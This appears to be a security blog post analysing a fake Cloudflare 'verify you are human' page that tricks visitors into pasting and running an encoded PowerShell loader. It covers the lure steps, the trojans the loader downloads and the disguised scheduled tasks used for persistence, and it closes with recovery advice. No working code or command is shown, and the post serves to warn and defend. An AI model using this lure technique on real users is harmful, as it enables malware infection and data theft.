Paste-and-Run Phishing

The “Paste-and-Run” Trap: How I Analyzed a New Phishing Attack

Security | Written By |
The “Paste-and-Run” Trap — A New Social Engineering Tactic Caught in the Wild

The “Paste-and-Run” Trap: A New Social Engineering Tactic I Caught in the Wild

While performing a routine security audit on a website that was showing signs of a breach, I encountered something far more sophisticated than a standard phishing link. I found a live “Paste-and-Run” infection chain.

This attack doesn’t rely on a “hidden” virus file. Instead, it uses you as the delivery mechanism. It tricks the user into manually bypassing the computer’s security layers by following a few simple steps. Here is a deep dive into how this attack works and how I analyzed the malware behind it.

Fake Cloudflare Verification Steps

Phase 1: The Social Engineering Hook

The attack presents itself as a familiar Cloudflare “Verify you are human” page. However, the checkbox is broken. It then presents “Verification Steps” that look technical but are actually instructions for a self-infection:

  1. Win + R: Opens the Windows “Run” dialog box.
  2. Ctrl + V: Pastes a command that the website has already copied to your clipboard.
  3. Enter: Executes the command immediately.

Because the user is the one typing the command, Windows assumes the action is intentional. This allows the malware to bypass the “sandbox” protections that modern browsers like Chrome or Edge use to keep you safe.

Phase 2: Decoding the Payload

During my audit, I analyzed the code that the site tried to paste into the Run box. It was a Base64-encoded PowerShell script. Attackers encode their code so that simple antivirus software cannot “read” the malicious instructions as they pass through the browser.

Once decoded, the script acts as a “Loader.” Its only job is to reach out to a remote server and download much heavier viruses. My analysis of the host revealed that the script was attempting to install three dangerous threats:

Trojan Detection Alert 1
  • Trojan:Win64/Malgent!MSR: A primary infection tool that acts as a bridge for more malware.
  • Trojan:Win64/Lazy.PGLI!MTB: A persistent backdoor that allows hackers to control your PC remotely.
  • Trojan:PowerShell/Filesponger: A data-stealing script that “sponges” up your documents and passwords.
Trojan Detection Alert 2

Phase 3: Achieving Persistence

The cleverest part of this attack is how it stays on your computer even after you restart it. This is called Persistence. By digging into the Windows Task Scheduler, I found that the malware had created several “Ghost Tasks”:

The “Logon” Strategy

I found a task named BLACK FRIDAY Task. This was set to run a malicious script the moment any user logs into the computer. By naming it after a shopping event, the attackers hope you’ll ignore it as “adware” or bloatware.

Camouflage in Plain Sight

I discovered other tasks with names like conhost, dllhost, and Internet Health Monitor. These are real Windows file names. A regular user looking at their task list would see “Internet Health Monitor” and think it’s a helpful system tool, while it’s actually the malware checking if the connection to the hacker is still open.

Already Followed the Steps? Here is the Recovery Plan

If you have already performed the “Win + R” and “Enter” steps on a suspicious site, your computer is likely compromised. Here is exactly what I did to clean the environment during my audit:

  1. Cut the Connection: Immediately turn off your Wi-Fi or unplug your internet cable. This prevents the “Filesponger” script from sending your data to the hacker.
  2. Kill the “Run” Process: Open Task Manager (Ctrl + Shift + Esc) and look for powershell.exe or cmd.exe. Right-click and select End Task.
  3. Remove Scheduled Tasks: Open “Task Scheduler” and look for the names mentioned above (Internet Health Monitor, etc.). Delete any task that was created on the day the infection happened.
  4. Perform a Microsoft Defender Offline Scan: This is crucial. Go to Settings > Update & Security > Windows Security > Virus & threat protection > Scan options > Microsoft Defender Offline scan. Your PC will restart and scan for the virus before Windows even loads.
  5. Audit Your Extensions: Attackers often install hidden browser extensions to steal your passwords. Check chrome://extensions/ and remove anything you don’t recognize.

The Final Takeaway

Phishing is no longer just about clicking a link. It is now about tricking you into being the “Administrator” of your own infection. A legitimate service will never ask you to open a system box or run commands manually.

Be observant. If a website asks you to interact with your operating system to prove you are “human,” it is almost certainly a trap.

Related Posts